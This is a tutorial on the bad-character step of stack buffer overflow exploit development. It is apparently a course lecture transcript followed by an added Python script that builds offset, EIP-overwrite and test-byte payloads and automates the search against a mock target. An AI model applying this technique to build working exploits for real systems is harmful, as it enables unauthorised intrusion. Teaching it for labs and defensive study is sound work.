Finding bad characters

Our learning objective is to understand how to find bad characters.
I did a lot of buffer overflow practice and I can tell you that the biggest mistake I made was just skipping over this part. Do not skip over this part. You'll thank me later. Finding bad characters is very important and I'll show you how.
So now that we've figured out how to control the EIP, I've written another program with bad characters. The thing is, we don't know which characters will cause the program to act in a certain way that we're not aware of. We typically skip 00 because that's the null byte, which will terminate the remainder of the shellcode, so it's always a bad character. So I start with 01, and you'll notice I go all the way to FF here, and I'm using this to try to figure out if there is some character that, if we put it in our shellcode, will cause the shellcode to not work and crash the program, and therefore us not get a shell. So I will send this. You'll notice I have my offset of 146, I have my Bs, and now I'm adding all these bad characters to figure out which ones are bad.
So let's send this and let's go back. Let's see what we have. So obviously the program has crashed. So I'll go to ESP, and you can see here 01 02 03 04 05 06 07 08 09 21 21 21 21. So we have an issue here. If we look back at our script, it should be 0A 0B 0C 0D 0E 0F and so on.
So let's take out the 0A. I should probably go back here and restart the program. And the hope is that we see every character without it causing any character to not appear in memory. So let's send this again.
So now we can... I mean, this is a manual review. There are ways you can do this with Mona; I suggest you research that, but I do it the hard way. 01 02 03 04 05 06 07 08 09 0B 0C 0D 0E 0F, and like we saw it goes all the way to FF, and it doesn't look like anything's missing or has caused a crash. I also have read the guide, and he tells me that the only bad characters are 00 and 0A.
So now I know what my bad characters are. Do not skip this. Do not skip this, and make sure you carefully check which characters are the bad characters, because when you get to your shellcode and you specify your bad characters and you miss one, it will cause your shellcode not to work and the program to crash, and you'll be wondering why. So that's how to find bad characters.

In summary, we should now understand how to find bad characters.
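The manual loop described in this lecture (build the 01..FF string, send it after the offset and the EIP overwrite, look at ESP, drop the first byte that does not survive, repeat) as a worked example. This is added code, not the script from the video or the course: `OFFSET`, `build_payload`, `locate_bad_chars` and the `fake_target` stand-in are all assumptions made here. `fake_target` is a constructed substitute for "send it to the program and read memory at ESP in the debugger"; it mimics the behaviour seen above, where everything after 0A came back as 21 bytes. It also goes slightly beyond the lecture by running the remove-and-resend loop automatically until the dump is intact.

```python
"""Bad-character discovery helpers (added example, not the video's script)."""
from typing import Callable, Iterable, List, Optional


def build_badchars(exclude: Iterable[int] = (0x00,)) -> bytes:
    """All byte values 0x00..0xff except those already known to be bad.

    0x00 is excluded by default: as a string terminator it cuts the
    payload short, so it is treated as bad without testing it.
    """
    excluded = set(exclude)
    return bytes(b for b in range(0x100) if b not in excluded)


def build_payload(offset: int, badchars: bytes) -> bytes:
    """Filler up to the offset, four bytes over EIP, then the test characters."""
    return b"A" * offset + b"B" * 4 + badchars


def parse_dump(hexdump: str) -> bytes:
    """Turn debugger-style hex text ("01 02 03 ... 09 21 21") into bytes."""
    return bytes.fromhex("".join(hexdump.split()))


def first_divergence(sent: bytes, dumped: bytes) -> Optional[int]:
    """Index of the first byte where memory differs from what was sent; None if intact."""
    for i, (s, d) in enumerate(zip(sent, dumped)):
        if s != d:
            return i
    # A dump that is simply shorter than what we sent is also a divergence.
    return len(dumped) if len(dumped) < len(sent) else None


def find_bad_char(sent: bytes, dumped: bytes) -> Optional[int]:
    """The sent byte at the first divergence is the next bad-character candidate."""
    i = first_divergence(sent, dumped)
    return None if i is None else sent[i]


def locate_bad_chars(dump_at_esp: Callable[[bytes], bytes], offset: int,
                     known: Iterable[int] = (0x00,), max_rounds: int = 16) -> List[int]:
    """Repeat send -> inspect ESP -> drop the first mangled byte until the dump is intact.

    dump_at_esp stands in for "send the payload and read memory at ESP in the debugger".
    Only one byte is removed per round, because a bad byte can mangle everything
    after it (as 0A did above), so later bytes cannot be judged in the same round.
    """
    bad = list(known)
    for _ in range(max_rounds):
        chars = build_badchars(bad)
        dumped = dump_at_esp(build_payload(offset, chars))
        nxt = find_bad_char(chars, dumped)
        if nxt is None:
            return bad
        bad.append(nxt)
    raise RuntimeError("too many rounds; check the dump source")


# Constructed stand-in for the crashed program (assumption, not real target
# behaviour): it treats 0A as end of line, and what lands at ESP after it is
# the 21 ('!') filler seen in the lecture's ESP dump.
OFFSET = 146


def fake_target(payload: bytes) -> bytes:
    at_esp = payload[OFFSET + 4:]
    cut = at_esp.find(b"\x0a")
    if cut == -1:
        return at_esp
    return at_esp[:cut] + b"\x21" * (len(at_esp) - cut)


if __name__ == "__main__":
    found = locate_bad_chars(fake_target, OFFSET)
    print("bad characters:", " ".join(f"\\x{b:02x}" for b in found))
```

In a real session `fake_target` is replaced by sending the payload and copying the bytes shown at ESP into `parse_dump`; `find_bad_char` then names the byte at the first mismatch, exactly the 09 -> 21 comparison done by eye above. The point of removing only one byte per round is the one the lecture makes: after a bad byte, the rest of the dump is unreliable, so a character that merely sits behind a bad one is not itself bad.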